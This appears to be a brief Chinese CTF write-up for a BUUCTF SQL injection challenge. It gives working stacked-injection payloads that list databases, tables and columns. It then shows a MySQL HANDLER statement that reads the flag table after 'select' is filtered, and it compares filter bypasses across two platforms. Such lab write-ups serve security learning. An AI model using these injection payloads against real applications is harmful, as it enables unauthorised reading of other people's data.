之前做过这题,就当是复习了
堆叠注入得到数据库名,表名,列名
-1';show databases;# //得到库名
-1';show tables;# //得到表名
-1';show columns from FlagHere;#//得到列名
下面就是主要点,select被过滤了,这题考的就是这个的过滤思路,三种思路,可以看我之前的文章
https://blog.csdn.net/qq_41696858/article/details/119513224
但是buuctf的靶场和攻防世界的还不一样,攻防世界靶场可以大小写绕过某些过滤,而buuctf不可以,所以方法1,2失效
剩下的只有mysql带的handler
-1';handler `FlagHere` open;handler `FlagHere` read first;#
参考视频链接:https://www.bilibili.com/video/BV1534y1U731/